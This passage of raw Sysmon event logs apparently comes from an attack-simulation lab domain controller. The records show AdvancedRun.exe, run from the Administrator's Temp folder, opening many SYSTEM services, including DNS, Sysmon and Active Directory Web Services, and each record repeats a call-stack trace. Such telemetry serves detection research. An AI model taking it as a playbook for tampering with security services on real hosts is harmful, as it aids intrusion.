Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067450Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.655{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067449Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.655{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067448Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.655{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067447Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.654{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067446Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.654{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067445Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.654{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067444Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.654{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067443Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.654{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067442Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.654{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067441Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.653{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004067440Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.653{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067439Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.653{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067438Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.653{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067437Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.653{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067436Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.652{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067435Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.652{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067434Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 